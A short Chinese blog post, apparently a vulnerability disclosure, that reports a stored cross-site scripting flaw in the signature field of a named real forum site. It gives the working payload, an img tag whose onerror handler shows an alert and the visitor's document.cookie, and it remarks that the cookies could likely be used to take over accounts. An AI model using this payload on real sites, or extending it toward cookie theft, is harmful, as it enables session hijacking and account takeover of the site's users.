随便找一个论坛链接 http://home.focus.cn/msgview/1632/270131257.html 在个人签名处输入: <p> <img height=”0″ onerror=”alert(/亲,这里有个xss 漏洞你们知道吗/);alert(document.cookie)” src=”#” width=”0″ />这个人很懒,留下个弹窗</p> 弹个小窗 cookie很多料,估计可盗号(没试,纯YY) 上一篇: TCCMS某处设计缺陷,成功打入官网后台 – 网站安全 下一篇: 腾讯视频主站分享至微信xss一枚,可cookie哦!
评论前必须登录!
立即登录